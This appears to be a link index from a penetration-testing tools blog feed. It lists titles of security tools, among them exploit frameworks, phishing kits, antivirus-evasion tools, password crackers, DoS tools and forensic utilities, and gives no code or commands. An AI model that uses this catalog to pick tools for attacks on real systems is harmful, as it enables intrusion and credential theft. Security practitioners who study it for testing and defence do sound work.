- [Pocsuite3 - An Open-Sourced Remote Vulnerability Testing Framework](http://feedproxy.google.com/~r/PentestTools/~3/x6R6agm_yNE/pocsuite3-open-sourced-remote.html)
- [XanXSS - A Simple XSS Finding Tool](http://feedproxy.google.com/~r/PentestTools/~3/l-J2Alp5HZY/xanxss-simple-xss-finding-tool.html)
- [Pyrit - The Famous WPA Precomputed Cracker](http://feedproxy.google.com/~r/PentestTools/~3/V8MTVWRjf0k/pyrit-famous-wpa-precomputed-cracker.html)
- [Faraday v3.7 - Collaborative Penetration Test and Vulnerability Management Platform](http://feedproxy.google.com/~r/PentestTools/~3/oLcdNOwS8pg/faraday-v37-collaborative-penetration.html)
- [PowerShellArsenal - A PowerShell Module Dedicated To Reverse Engineering](http://feedproxy.google.com/~r/PentestTools/~3/dBmXp-b1EI0/powershellarsenal-powershell-module.html)
- [Darksplitz - Exploit Framework](http://feedproxy.google.com/~r/PentestTools/~3/i5XdO5H76m8/darksplitz-exploit-framework.html)
- [CHAOS Framework v3.0 - Generate Payloads And Control Remote Windows Systems](http://feedproxy.google.com/~r/PentestTools/~3/qSMqQNeFOgU/chaos-framework-v20-generate-payloads.html)
- [CHAOS Framework v2.0 - Generate Payloads And Control Remote Windows Systems](http://feedproxy.google.com/~r/PentestTools/~3/qSMqQNeFOgU/chaos-framework-v20-generate-payloads.html)
- [ISeeYou - Bash And Javascript Tool To Find The Exact Location Of The Users During Social Engineering Or Phishing Engagements](http://feedproxy.google.com/~r/PentestTools/~3/kBe1Xfh9iTc/iseeyou-bash-and-javascript-tool-to.html)
- [Instainsane - Multi-threaded Instagram Brute Forcer](http://feedproxy.google.com/~r/PentestTools/~3/n2J8ihzAvxI/instainsane-multi-threaded-instagram.html)
- [Evillimiter - Limits Bandwidth Of Devices On The Same Network](http://feedproxy.google.com/~r/PentestTools/~3/L71rmvqXuTY/evillimiter-limits-bandwidth-of-devices.html)
- [Osmedeus - Fully Automated Offensive Security Tool For Reconnaissance And Vulnerability Scanning](http://feedproxy.google.com/~r/PentestTools/~3/DCeXRDXo4J0/osmedeus-fully-automated-offensive.html)
- [Mimikatz v2.2.0 - A Post-Exploitation Tool to Extract Plaintexts Passwords, Hash, PIN Code from Memory](http://feedproxy.google.com/~r/PentestTools/~3/m-Z8svy5Mbg/mimikatz-v220-post-exploitation-tool-to.html)
- [Commando VM - The First of Its Kind Windows Offensive Distribution](http://feedproxy.google.com/~r/PentestTools/~3/7vdMiUOLgeU/commando-vm-first-of-its-kind-windows.html)
- [IDArling - Collaborative Reverse Engineering Plugin For IDA Pro & Hex-Rays](http://feedproxy.google.com/~r/PentestTools/~3/iENP1YvFAOE/idarling-collaborative-reverse.html)
- [Wireshark Cheatsheet](http://feedproxy.google.com/~r/PentestTools/~3/I1DdQx4THpA/wireshark-cheatsheet.html)
- [FFM (Freedom Fighting Mode) - Open Source Hacking Harness](http://feedproxy.google.com/~r/PentestTools/~3/0T8msrFGIbE/ffm-freedom-fighting-mode-open-source.html)
- [Just-Metadata - Tool That Gathers And Analyzes Metadata About IP Addresses](http://feedproxy.google.com/~r/PentestTools/~3/woImI_1gz9Y/just-metadata-tool-that-gathers-and.html)
- [phpMussel - PHP-based Anti-Virus Anti-Trojan Anti-Malware Solution](http://feedproxy.google.com/~r/PentestTools/~3/GyXiM5XXkzc/phpmussel-php-based-anti-virus-anti.html)
- [WinPwn - Automation For Internal Windows Penetrationtest](http://feedproxy.google.com/~r/PentestTools/~3/9lPHNu1cvU8/winpwn-automation-for-internal-windows.html)
- [Reconerator - C# Targeted Attack Reconnaissance Tools](http://feedproxy.google.com/~r/PentestTools/~3/ijyKtK7r7jk/reconerator-c-targeted-attack.html)
- [Mutiny Fuzzing Framework - Network Fuzzer That Operates By Replaying PCAPs Through A Mutational Fuzzer](http://feedproxy.google.com/~r/PentestTools/~3/2MWStTlswIE/mutiny-fuzzing-framework-network-fuzzer.html)
- [Flightsim - A Utility To Generate Malicious Network Traffic And Evaluate Controls](http://feedproxy.google.com/~r/PentestTools/~3/iP4qxku8k_8/flightsim-utility-to-generate-malicious.html)
- [LAPSToolkit - Tool To Audit And Attack LAPS Environments](http://feedproxy.google.com/~r/PentestTools/~3/0JNW5bf6UGc/lapstoolkit-tool-to-audit-and-attack.html)
- [Xori - An Automation-Ready Disassembly And Static Analysis Library For PE32, 32+ And Shellcode](http://feedproxy.google.com/~r/PentestTools/~3/4m8ecBSKkZc/xori-automation-ready-disassembly-and.html)
- [H2T - Scans A Website And Suggests Security Headers To Apply](http://feedproxy.google.com/~r/PentestTools/~3/LaZLa7zlv9k/h2t-scans-website-and-suggests-security.html)
- [Got-Responded - A Simple Tool To Detect NBT-NS And LLMNR Spoofing](http://feedproxy.google.com/~r/PentestTools/~3/JiuGZeJ1OoU/got-responded-simple-tool-to-detect-nbt.html)
- [WPScan v3.4.5 - Black Box WordPress Vulnerability Scanner](http://feedproxy.google.com/~r/PentestTools/~3/36ioKYj1ExE/wpscan-v345-black-box-wordpress.html)
- [Androwarn - Yet Another Static Code Analyzer For Malicious Android Applications](http://feedproxy.google.com/~r/PentestTools/~3/CXJc4Zacvso/androwarn-yet-another-static-code.html)
- [FIR - Fast Incident Response](http://feedproxy.google.com/~r/PentestTools/~3/ppBJPOSeiE4/fir-fast-incident-response.html)
- [Webtech - Identify Technologies Used On Websites](http://feedproxy.google.com/~r/PentestTools/~3/bguM2uPOwiU/webtech-identify-technologies-used-on.html)
- [Lynis 2.7.3 - Security Auditing Tool for Unix/Linux Systems](http://feedproxy.google.com/~r/PentestTools/~3/SfDf5sliFYA/lynis-273-security-auditing-tool-for.html)
- [SMS-Stack - Framework to provided TPC/IP based characteristics to the GSM Short Message Service](http://feedproxy.google.com/~r/PentestTools/~3/9hceL_jtpCY/sms-stack-framework-to-provided-tpcip.html)
- [Xerxes - DoS Tool Enhanced](http://feedproxy.google.com/~r/PentestTools/~3/FKQz_c3NmhA/xerxes-dos-tool-enhanced.html)
- [mXtract - Memory Extractor & Analyzer](http://feedproxy.google.com/~r/PentestTools/~3/klmJCxzlVRA/mxtract-memory-extractor-analyzer.html)
- [RapidRepoPull - Tool To Quickly Pull And Install Repos From A List](http://feedproxy.google.com/~r/PentestTools/~3/eSN79pCheoQ/rapidrepopull-tool-to-quickly-pull-and.html)
- [Goscan - Interactive Network Scanner](http://feedproxy.google.com/~r/PentestTools/~3/QvZdo-L3mC8/goscan-interactive-network-scanner.html)
- [Remot3d v2.0 - Tool Created For Large Pentesters As Well As Just For The Pleasure Of Defacers To Control Server By Backdoors](http://feedproxy.google.com/~r/PentestTools/~3/yLlm2OQbWtE/remot3d-v20-tool-created-for-large.html)
- [Dnsdmpstr - Unofficial API & Client For Dnsdumpster.Com And Hackertarget.Com](http://feedproxy.google.com/~r/PentestTools/~3/cJrHa_dhIkQ/dnsdmpstr-unofficial-api-client-for.html)
- [Freevulnsearch - Free And Open NMAP NSE Script To Query Vulnerabilities Via The cve-search.org API](http://feedproxy.google.com/~r/PentestTools/~3/hRdoLgffwbs/freevulnsearch-free-and-open-nmap-nse.html)
- [Armory - A Tool Meant To Take In A Lot Of External And Discovery Data From A Lot Of Tools, Add It To A Database And Correlate All Of Related Information](http://feedproxy.google.com/~r/PentestTools/~3/Dxhfc9Rx4sk/armory-tool-meant-to-take-in-lot-of.html)
- [DOGE - Darknet Osint Graph Explorer](http://feedproxy.google.com/~r/PentestTools/~3/Ugv1-a3xlrQ/doge-darknet-osint-graph-explorer.html)
- [Mad-Metasploit - Metasploit Custom Modules, Plugins & Resource Scripts](http://feedproxy.google.com/~r/PentestTools/~3/D8ExNN2Y8Rs/mad-metasploit-metasploit-custom.html)
- [Metaforge - An OSINT Metadata Analyzing Tool That Filters Through Tags And Creates Reports](http://feedproxy.google.com/~r/PentestTools/~3/sRAY17Dl5eQ/metaforge-osint-metadata-analyzing-tool.html)
- [Hashboy-Tool - A Hash Query Tool](http://feedproxy.google.com/~r/PentestTools/~3/WF_Ut4LqVas/hashboy-tool-hash-query-tool.html)
- [CarbonCopy - A Tool Which Creates A Spoofed Certificate Of Any Online Website And Signs An Executable For AV Evasion](http://feedproxy.google.com/~r/PentestTools/~3/696PzvX73MM/carboncopy-tool-which-creates-spoofed.html)
- [Karma - Search of Emails and Passwords on Pwndb](http://feedproxy.google.com/~r/PentestTools/~3/Z2_HhIVSkSU/karma-search-of-emails-and-passwords-on.html)
- [Arjun v1.3 - HTTP Parameter Discovery Suite](http://feedproxy.google.com/~r/PentestTools/~3/zWZXsOUSOfk/arjun-v13-http-parameter-discovery-suite.html)
- [SocialFish v2 - Educational Phishing Tool & Information Collector](http://feedproxy.google.com/~r/PentestTools/~3/UIciopFruGI/socialfish-v2-educational-phishing-tool.html)
- [DNS-Shell - An Interactive Shell Over DNS Channel](http://feedproxy.google.com/~r/PentestTools/~3/-RbwR0s6j4w/dns-shell-interactive-shell-over-dns.html)
- [Decker - Declarative Penetration Testing Orchestration Framework](http://feedproxy.google.com/~r/PentestTools/~3/v-JzhQO-i2Q/decker-declarative-penetration-testing.html)
- [PFQ - Functional Network Framework For Multi-Core Architectures](http://feedproxy.google.com/~r/PentestTools/~3/lHrferXOPnc/pfq-functional-network-framework-for.html)
- [Hostintel - A Modular Python Application To Collect Intelligence For Malicious Hosts](http://feedproxy.google.com/~r/PentestTools/~3/MPHA1vA45o0/hostintel-modular-python-application-to.html)
- [IoT-Home-Guard - A Tool For Malicious Behavior Detection In IoT Devices](http://feedproxy.google.com/~r/PentestTools/~3/00rK4kMhDhs/iot-home-guard-tool-for-malicious.html)
- [Acunetix Web Application Vulnerability Report 2019](http://feedproxy.google.com/~r/PentestTools/~3/pkuHKauhESU/acunetix-web-application-vulnerability.html)
- [Kage - Graphical User Interface For Metasploit Meterpreter And Session Handler](http://feedproxy.google.com/~r/PentestTools/~3/tRooyJ9gO2o/kage-graphical-user-interface-for.html)
- [rootOS - macOS Root Helper](http://feedproxy.google.com/~r/PentestTools/~3/DYTj2i_s_Hs/rootos-macos-root-helper.html)
- [Vuls - Vulnerability Scanner For Linux/FreeBSD, Agentless, Written In Go](http://feedproxy.google.com/~r/PentestTools/~3/LeiEkChMh4Y/vuls-vulnerability-scanner-for.html)
- [Reverse Shell Cheat Sheet](http://feedproxy.google.com/~r/PentestTools/~3/Ygxu7rgH7jo/reverse-shell-cheat-sheet.html)
- [AutoRDPwn v4.8 - The Shadow Attack Framework](http://feedproxy.google.com/~r/PentestTools/~3/jFXs4Lm9-_8/autordpwn-v48-shadow-attack-framework.html)
- [Cat-Nip - Automated Basic Pentest Tool (Designed For Kali Linux)](http://feedproxy.google.com/~r/PentestTools/~3/8By2_tKKSAQ/cat-nip-automated-basic-pentest-tool.html)
- [Goca Scanner - FOCA fork written in Go](http://feedproxy.google.com/~r/PentestTools/~3/fyg9c9PUyTc/goca-scanner-foca-fork-written-in-go.html)
- [Chomp Scan - A Scripted Pipeline Of Tools To Streamline The Bug Bounty/Penetration Test Reconnaissance Phase](http://feedproxy.google.com/~r/PentestTools/~3/tYTe2G8JkeM/chomp-scan-scripted-pipeline-of-tools.html)
- [Turbinia - Automation And Scaling Of Digital Forensics Tools](http://feedproxy.google.com/~r/PentestTools/~3/fVMVv8I43F4/turbinia-automation-and-scaling-of.html)
- [Ghidra - Software Reverse Engineering Framework](http://feedproxy.google.com/~r/PentestTools/~3/3UcCac0PJA4/ghidra-software-reverse-engineering.html)
- [Legion - An Easy-To-Use, Super-Extensible And Semi-Automated Network Penetration Testing Tool That Aids In Discovery, Reconnaissance And Exploitation Of Information Systems](http://feedproxy.google.com/~r/PentestTools/~3/jDSvXwEafjY/legion-easy-to-use-super-extensible-and.html)
- [Reload.sh - Reinstall, Restore And Wipe Your System Via SSH, Without Rebooting](http://feedproxy.google.com/~r/PentestTools/~3/FFaKm01Nscg/reloadsh-reinstall-restore-and-wipe.html)
- [UserLAnd - The Easiest Way To Run A Linux Distribution or Application on Android](http://feedproxy.google.com/~r/PentestTools/~3/Z6GCKCBT-sI/userland-easiest-way-to-run-linux.html)
- [Cuteit v0.2.1 - IP Obfuscator Made To Make A Malicious Ip A Bit Cuter](http://feedproxy.google.com/~r/PentestTools/~3/SmoBE9chyxU/cuteit-v021-ip-obfuscator-made-to-make.html)
- [Rpi-Hunter - Automate Discovering And Dropping Payloads On LAN Raspberry Pi's Via SSH](http://feedproxy.google.com/~r/PentestTools/~3/cPYvAMXfbJo/rpi-hunter-automate-discovering-and.html)
- [CMSeeK v1.1.1 - CMS Detection And Exploitation Suite (Scan WordPress, Joomla, Drupal And 150 Other CMSs)](http://feedproxy.google.com/~r/PentestTools/~3/8EDnhSxC2Hw/cmseek-v111-cms-detection-and.html)
- [Faraday v3.6 - Collaborative Penetration Test and Vulnerability Management Platform](http://feedproxy.google.com/~r/PentestTools/~3/xuC5gpNVqec/faraday-v36-collaborative-penetration.html)
- [Phantom Evasion - Python AV Evasion Tool Capable To Generate FUD Executable Even With The Most Common 32 Bit Metasploit Payload (Exe/Elf/Dmg/Apk)](http://feedproxy.google.com/~r/PentestTools/~3/u2lYO11vEuc/phantom-evasion-python-av-evasion-tool.html)
- [Strelka - Scanning Files At Scale With Python And ZeroMQ](http://feedproxy.google.com/~r/PentestTools/~3/J5e-Il60yXg/strelka-scanning-files-at-scale-with.html)
- [Imago Forensics - Imago Is A Python Tool That Extract Digital Evidences From Images](http://feedproxy.google.com/~r/PentestTools/~3/JzmwiCsLTtY/imago-forensics-imago-is-python-tool.html)
- [VSHG - Hardware resistance & enhanced security for GnuPG](http://feedproxy.google.com/~r/PentestTools/~3/6L_0uMuwloY/vshg-hardware-resistance-enhanced.html)
- [Angr - A Powerful And User-Friendly Binary Analysis Platform](http://feedproxy.google.com/~r/PentestTools/~3/d91K9L2OVN8/angr-powerful-and-user-friendly-binary.html)
- [Ntopng - Web-based Traffic And Security Network Traffic Monitoring](http://feedproxy.google.com/~r/PentestTools/~3/3TSYk971DW0/ntopng-web-based-traffic-and-security.html)
- [HT-WPS Breaker - High Touch WPS Breaker](http://feedproxy.google.com/~r/PentestTools/~3/ELDL0kdTbPo/ht-wps-breaker-high-touch-wps-breaker.html)
- [Ophcrack - A Windows Password Cracker Based On Rainbow Tables](http://feedproxy.google.com/~r/PentestTools/~3/24cbWRaWa8k/ophcrack-windows-password-cracker-based.html)
- [Metasploit Cheat Sheet](http://feedproxy.google.com/~r/PentestTools/~3/o__OH665w5U/metasploit-cheat-sheet.html)
- [SALT - SLUB ALlocator Tracer For The Linux Kernel](http://feedproxy.google.com/~r/PentestTools/~3/841MbWBL0_8/salt-slub-allocator-tracer-for-linux.html)
- [Command Injection Payload List](http://feedproxy.google.com/~r/PentestTools/~3/YXW6UlJA36g/command-injection-payload-list.html)
- [Reko - A General Purpose Binary Decompiler](http://feedproxy.google.com/~r/PentestTools/~3/nwLk-LG8bbo/reko-general-purpose-binary-decompiler.html)
- [Iptables Essentials - Common Firewall Rules And Commands](http://feedproxy.google.com/~r/PentestTools/~3/QxQzNFl9P6o/iptables-essentials-common-firewall.html)
- [HexRaysCodeXplorer - Hex-Rays Decompiler Plugin For Better Code Navigation](http://feedproxy.google.com/~r/PentestTools/~3/nViFOGTghjU/hexrayscodexplorer-hex-rays-decompiler.html)
- [PHP Security Check List](http://feedproxy.google.com/~r/PentestTools/~3/Fz-b3ysARp4/php-security-check-list.html)
- [OSFClone - Open Source Utility To Create And Clone Forensic Disk Images](http://feedproxy.google.com/~r/PentestTools/~3/MtkDht4BEQY/osfclone-open-source-utility-to-create.html)
- [Cheat Engine - A Development Environment Focused On Modding](http://feedproxy.google.com/~r/PentestTools/~3/hmyT4ewgMO8/cheat-engine-development-environment.html)
- [BeEF - The Browser Exploitation Framework Project](http://feedproxy.google.com/~r/PentestTools/~3/W1UXPoIIVbg/beef-browser-exploitation-framework.html)
- [Eraser - Secure Erase Files from Hard Drives on Windows](http://feedproxy.google.com/~r/PentestTools/~3/94Y32zmk1ws/eraser-secure-erase-files-from-hard.html)
- [SecLists - A Collection Of Multiple Types Of Lists Used During Security Assessments, Collected In One Place (Usernames, Passwords, URLs, Sensitive Data Patterns, Fuzzing Payloads, Web Shells, And Many More)](http://feedproxy.google.com/~r/PentestTools/~3/oN0YzDUFStg/seclists-collection-of-multiple-types.html)
- [GameGuardian - Android Game Hack/Alteration Tool](http://feedproxy.google.com/~r/PentestTools/~3/6ReYL4igg7Q/gameguardian-android-game.html)
- [OSINT-SPY - Search using OSINT (Open Source Intelligence)](http://feedproxy.google.com/~r/PentestTools/~3/-x63Tn8Ij2w/osint-spy-search-using-osint-open.html)
- [Maltego CE - An Interactive Data Mining Tool That Renders Directed Graphs For Link Analysis](http://feedproxy.google.com/~r/PentestTools/~3/up3tM_gz8JE/maltego-ce-interactive-data-mining-tool.html)
- [BoNeSi - The DDoS Botnet Simulator](http://feedproxy.google.com/~r/PentestTools/~3/C0CY4Q1tSyk/bonesi-ddos-botnet-simulator.html)
- [HoneyPy - A Low To Medium Interaction Honeypot](http://feedproxy.google.com/~r/PentestTools/~3/Tb-oc6uz-nw/honeypy-low-to-medium-interaction.html)
- [Egress-Assess - Tool Used To Test Egress Data Detection Capabilities](http://feedproxy.google.com/~r/PentestTools/~3/rKdOLuFB10w/egress-assess-tool-used-to-test-egress.html)
- [Fibratus - Tool For Exploration And Tracing Of The Windows Kernel](http://feedproxy.google.com/~r/PentestTools/~3/_sRsUUcl2vU/fibratus-tool-for-exploration-and.html)
- [TROMMEL - Sift Through Embedded Device Files To Identify Potential Vulnerable Indicators](http://feedproxy.google.com/~r/PentestTools/~3/UW_LBgpwYX4/trommel-sift-through-embedded-device.html)
- [DCOMrade - Powershell Script For Enumerating Vulnerable DCOM Applications](http://feedproxy.google.com/~r/PentestTools/~3/xaHJPu0lHk0/dcomrade-powershell-script-for.html)
- [Ponce - IDA Plugin For Symbolic Execution Just One-Click Away!](http://feedproxy.google.com/~r/PentestTools/~3/rD4UX2khHlQ/ponce-ida-plugin-for-symbolic-execution.html)
- [Kaboom - Automatic Pentest](http://feedproxy.google.com/~r/PentestTools/~3/dpBcPFYIccU/kaboom-automatic-pentest.html)
- [SSRFmap - Automatic SSRF Fuzzer And Exploitation Tool](http://feedproxy.google.com/~r/PentestTools/~3/sNJOEPAhpEU/ssrfmap-automatic-ssrf-fuzzer-and.html)
- [Pompem - Exploit and Vulnerability Finder](http://feedproxy.google.com/~r/PentestTools/~3/_sGYDk1y8f4/pompem-exploit-and-vulnerability-finder.html)
- [Lazygit - Simple Terminal UI For Git Commands](http://feedproxy.google.com/~r/PentestTools/~3/rs7BxUhTWmY/lazygit-simple-terminal-ui-for-git.html)
- [Up (Ultimate Plumber) - Tool For Writing Linux Pipes With Instant Live Preview](http://feedproxy.google.com/~r/PentestTools/~3/lQ3o3CxxgNU/up-ultimate-plumber-tool-for-writing.html)
- [CDF - Crypto Differential Fuzzing](http://feedproxy.google.com/~r/PentestTools/~3/QWrOPl4RtZg/cdf-crypto-differential-fuzzing.html)
- [Justniffer - Network TCP Packet Sniffer](http://feedproxy.google.com/~r/PentestTools/~3/ZeOTT8XrMaE/justniffer-network-tcp-packet-sniffer.html)
- [UEFI Firmware Parser - Parse BIOS/Intel ME/UEFI Firmware Related Structures: Volumes, FileSystems, Files, Etc](http://feedproxy.google.com/~r/PentestTools/~3/vrw7ce1SeJ0/uefi-firmware-parser-parse-biosintel.html)
- [PF_RING - High-Speed Packet Capture, Filtering And Analysis](http://feedproxy.google.com/~r/PentestTools/~3/JHNjKGg4NWI/pfring-high-speed-packet-capture.html)
- [Pftriage - Python Tool And Library To Help Analyze Files During Malware Triage And Analysis](http://feedproxy.google.com/~r/PentestTools/~3/ZjjYohz9GbE/pftriage-python-tool-and-library-to.html)
- [nDPI - Open Source Deep Packet Inspection Software Toolkit](http://feedproxy.google.com/~r/PentestTools/~3/Ehj6aq0lpFg/ndpi-open-source-deep-packet-inspection.html)
- [Hontel - Telnet Honeypot](http://feedproxy.google.com/~r/PentestTools/~3/7Qv62zGn_mo/hontel-telnet-honeypot.html)
- [Volatility Workbench - A GUI For Volatility Memory Forensics](http://feedproxy.google.com/~r/PentestTools/~3/OzWarBRi5YU/volatility-workbench-gui-for-volatility.html)
- [HTTrack Website Copier - Web Crawler And Offline Browser](http://feedproxy.google.com/~r/PentestTools/~3/-iUl75kJzG4/httrack-website-copier-web-crawler-and.html)
- [OSFMount - Mount Disk Images & Create RAM Drives](http://feedproxy.google.com/~r/PentestTools/~3/b1UlY7C2tko/osfmount-mount-disk-images-create-ram.html)
- [Process Hacker - A Free, Powerful, Multi-Purpose Tool That Helps You Monitor System Resources, Debug Software And Detect Malware](http://feedproxy.google.com/~r/PentestTools/~3/nL_bfHHeQgA/process-hacker-free-powerful-multi.html)
- [CANalyzat0r - Security Analysis Toolkit For Proprietary Car Protocols](http://feedproxy.google.com/~r/PentestTools/~3/KPeA8qxDNEk/canalyzat0r-security-analysis-toolkit.html)
- [DFIRTrack - The Incident Response Tracking Application](http://feedproxy.google.com/~r/PentestTools/~3/vHFBZOQWsMA/dfirtrack-incident-response-tracking.html)
- [Goscan - Interactive Network Scanner](http://feedproxy.google.com/~r/PentestTools/~3/uz1Ra9_76sE/goscan-interactive-network-scanner.html)
- [RedELK - Easy Deployable Tool For Red Teams Used For Tracking And Alarming About Blue Team Activities As Well As Better Usability In Long Term Operations](http://feedproxy.google.com/~r/PentestTools/~3/v3TIGlliuHU/redelk-easy-deployable-tool-for-red.html)
- [Fnord - Pattern Extractor For Obfuscated Code](http://feedproxy.google.com/~r/PentestTools/~3/kM2-_TEV7fY/fnord-pattern-extractor-for-obfuscated.html)
- [Bincat - Binary Code Static Analyser, With IDA Integration](http://feedproxy.google.com/~r/PentestTools/~3/M4xJHHI1nlw/bincat-binary-code-static-analyser-with.html)
- [Bscan - An Asynchronous Target Enumeration Tool](http://feedproxy.google.com/~r/PentestTools/~3/nmAEkhGVeYk/bscan-asynchronous-target-enumeration.html)
- [Modlishka - An Open Source Phishing Tool With 2FA Authentication](http://feedproxy.google.com/~r/PentestTools/~3/Z2CV9SS3UmA/modlishka-open-source-phishing-tool.html)
- [Fwknop - Single Packet Authorization & Port Knocking](http://feedproxy.google.com/~r/PentestTools/~3/Ty69-sAkBMw/fwknop-single-packet-authorization-port.html)
- [Netsniff-Ng - A Swiss Army Knife For Your Daily Linux Network Plumbing](http://feedproxy.google.com/~r/PentestTools/~3/i86oZPByzMQ/netsniff-ng-swiss-army-knife-for-your.html)
- [Electronegativity - Tool To Identify Misconfigurations And Security Anti-Patterns In Electron Applications](http://feedproxy.google.com/~r/PentestTools/~3/zp7KJ0Mg0-A/electronegativity-tool-to-identify.html)
- [LOLBAS - Living Off The Land Binaries And Scripts (LOLBins And LOLScripts)](http://feedproxy.google.com/~r/PentestTools/~3/jRBNy3dl0p4/lolbas-living-off-land-binaries-and.html)
- [XIP - Tool To Generate A List Of IP Addresses By Applying A Set Of Transformations Used To Bypass Security Measures E.G. Blacklist Filtering, WAF, Etc.](http://feedproxy.google.com/~r/PentestTools/~3/7I5CFPFXxWo/xip-tool-to-generate-list-of-ip.html)
- [Stenographer - A Packet Capture Solution Which Aims To Quickly Spool All Packets To Disk, Then Provide Simple, Fast Access To Subsets Of Those Packets](http://feedproxy.google.com/~r/PentestTools/~3/jbklI8CeJpA/stenographer-packet-capture-solution.html)
- [Fierce - Semi-Lightweight Scanner That Helps Locate Non-Contiguous IP Space And Hostnames Against Specified Domains](http://feedproxy.google.com/~r/PentestTools/~3/X8Fc7tY8OFI/fierce-semi-lightweight-scanner-that.html)
- [Bolt - CSRF Scanning Suite](http://feedproxy.google.com/~r/PentestTools/~3/vu2sbgER-jY/bolt-csrf-scanning-suite.html)
- [Pwndb - Search For Creadentials Leaked On Pwndb](http://feedproxy.google.com/~r/PentestTools/~3/StIgYaSXjQ8/pwndb-search-for-creadentials-leaked-on.html)
- [Pown Recon - A Powerful Target Reconnaissance Framework Powered By Graph Theory](http://feedproxy.google.com/~r/PentestTools/~3/P1jfEtHTWpY/pown-recon-powerful-target.html)
- [Uncle Spufus - A Tool That Automates Mac Address Spoofing](http://feedproxy.google.com/~r/PentestTools/~3/MtP954n5vhQ/uncle-spufus-tool-that-automates-mac.html)
- [CIRTKit - Tools For The Computer Incident Response Team](http://feedproxy.google.com/~r/PentestTools/~3/w0zubUkg6ms/cirtkit-tools-for-computer-incident.html)
- [ADAPT - Tool That Performs Automated Penetration Testing For WebApps](http://feedproxy.google.com/~r/PentestTools/~3/c3ObjGg1ce8/adapt-tool-that-performs-automated.html)
- [Scanner-Cli - A Project Security/Vulnerability/Risk Scanning Tool](http://feedproxy.google.com/~r/PentestTools/~3/JoL8_BBnrhQ/scanner-cli-project-securityvulnerabili.html)
- [Sn0Int - Semi-automatic OSINT Framework And Package Manager](http://feedproxy.google.com/~r/PentestTools/~3/K08LwvEQi2o/sn0int-semi-automatic-osint-framework.html)
- [FTW - Framework For Testing WAFs](http://feedproxy.google.com/~r/PentestTools/~3/vosO_nniiiI/ftw-framework-for-testing-wafs.html)
- [identYwaf - Blind WAF Identification Tool](http://feedproxy.google.com/~r/PentestTools/~3/UgxDsRiPrIY/identywaf-blind-waf-identification-tool.html)
- [Sh00T - A Testing Environment for Manual Security Testers](http://feedproxy.google.com/~r/PentestTools/~3/9c76MO4aIn0/sh00t-testing-environment-for-manual.html)
- [WiGLE - Wifi Wardriving (Nethugging Client For Android)](http://feedproxy.google.com/~r/PentestTools/~3/gDQEZOV06DY/wigle-wifi-wardriving-nethugging-client.html)
- [LeakLooker - Find Open Databases With Shodan](http://feedproxy.google.com/~r/PentestTools/~3/IenFsQWmHbY/leaklooker-find-open-databases-with.html)
- [SecureTea Project - The Purpose Of This Application Is To Warn The User (Via Various Communication Mechanisms) Whenever Their Laptop Accessed](http://feedproxy.google.com/~r/PentestTools/~3/BUlZL0iZhGQ/securetea-project-purpose-of-this.html)
- [ProcDump - A Linux Version Of The ProcDump Sysinternals Tool](http://feedproxy.google.com/~r/PentestTools/~3/tkcqiIG2iUQ/procdump-linux-version-of-procdump.html)
- [Parrot Security 4.5 - Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind](http://feedproxy.google.com/~r/PentestTools/~3/xXnhQTKJewU/parrot-security-45-security-gnulinux.html)
- [Jok3R - Network And Web Pentest Framework](http://feedproxy.google.com/~r/PentestTools/~3/dhiTfm3fEdk/jok3r-network-and-web-pentest-framework.html)
- [Beebug - A Tool For Checking Exploitability](http://feedproxy.google.com/~r/PentestTools/~3/lAJoFUTmlNs/beebug-tool-for-checking-exploitability.html)
- [Conpot - An Open Industrial Control Honeypot](http://feedproxy.google.com/~r/PentestTools/~3/Khos5GRsxrw/conpot-open-industrial-control-honeypot.html)
- [WPintel - Chrome Extension Designed For WordPress Vulnerability Scanning And Information Gathering](http://feedproxy.google.com/~r/PentestTools/~3/NYfoNh5N9zM/wpintel-chrome-extension-designed-for.html)
- [Malice - VirusTotal Wanna Be (Now With 100% More Hipster)](http://feedproxy.google.com/~r/PentestTools/~3/MYaRxSE3IIE/malice-virustotal-wanna-be-now-with-100.html)
- [Htcap - A Web Application Scanner Able To Crawl Single Page Application (SPA) In A Recursive Manner By Intercepting Ajax Calls And DOM Changes](http://feedproxy.google.com/~r/PentestTools/~3/aJgXuqnKFus/htcap-web-application-scanner-able-to.html)
- [Remot3d - An Simple Exploit for PHP Language](http://feedproxy.google.com/~r/PentestTools/~3/MfRDXGlJowM/remot3d-simple-exploit-for-php-language.html)
- [Tyton - Linux Kernel-Mode Rootkit Hunter for 4.4.0-31+](http://feedproxy.google.com/~r/PentestTools/~3/-SpNjyLloZM/tyton-linux-kernel-mode-rootkit-hunter.html)
- [Crashcast-Exploit - This Tool Allows You Mass Play Any YouTube Video With Chromecasts Obtained From Shodan.io](http://feedproxy.google.com/~r/PentestTools/~3/xeXSGXnN_xA/crashcast-exploit-this-tool-allows-you.html)
- [Tool-X - A Kali Linux Hacking Tool Installer](http://feedproxy.google.com/~r/PentestTools/~3/JqzGZm7j4JQ/tool-x-kali-linux-hacking-tool-installer.html)
- [SQLMap v1.3 - Automatic SQL Injection And Database Takeover Tool](http://feedproxy.google.com/~r/PentestTools/~3/RNZTk3qTooc/sqlmap-v13-automatic-sql-injection-and.html)
- [Stretcher - Tool Designed To Help Identify Open Elasticsearch Servers That Are Exposing Sensitive Information](http://feedproxy.google.com/~r/PentestTools/~3/PdXu9zuRDIg/stretcher-tool-designed-to-help.html)
- [Aztarna - A Footprinting Tool For Robots](http://feedproxy.google.com/~r/PentestTools/~3/Q9CYfShlqRA/aztarna-footprinting-tool-for-robots.html)
- [Hediye - Hash Generator & Cracker Online Offline](http://feedproxy.google.com/~r/PentestTools/~3/p0oO5qBUFoI/hediye-hash-generator-cracker-online.html)
- [Killcast - Manipulate Chromecast Devices In Your Network](http://feedproxy.google.com/~r/PentestTools/~3/rMCHdNb3sTI/killcast-manipulate-chromecast-devices.html)
- [bypass-firewalls-by-DNS-history - Firewall Bypass Script Based On DNS History Records](http://feedproxy.google.com/~r/PentestTools/~3/4GvtphGIZmM/bypass-firewalls-by-dns-history.html)
- [WiFi-Pumpkin v0.8.7 - Framework for Rogue Wi-Fi Access Point Attack](http://feedproxy.google.com/~r/PentestTools/~3/HogR4BTI3tM/wifi-pumpkin-v087-framework-for-rogue.html)
- [H8Mail - Email OSINT And Password Breach Hunting](http://feedproxy.google.com/~r/PentestTools/~3/u6x3-7n6oMI/h8mail-email-osint-and-password-breach.html)
- [Kube-Hunter - Hunt For Security Weaknesses In Kubernetes Clusters](http://feedproxy.google.com/~r/PentestTools/~3/Dr1bT8peAAc/kube-hunter-hunt-for-security.html)
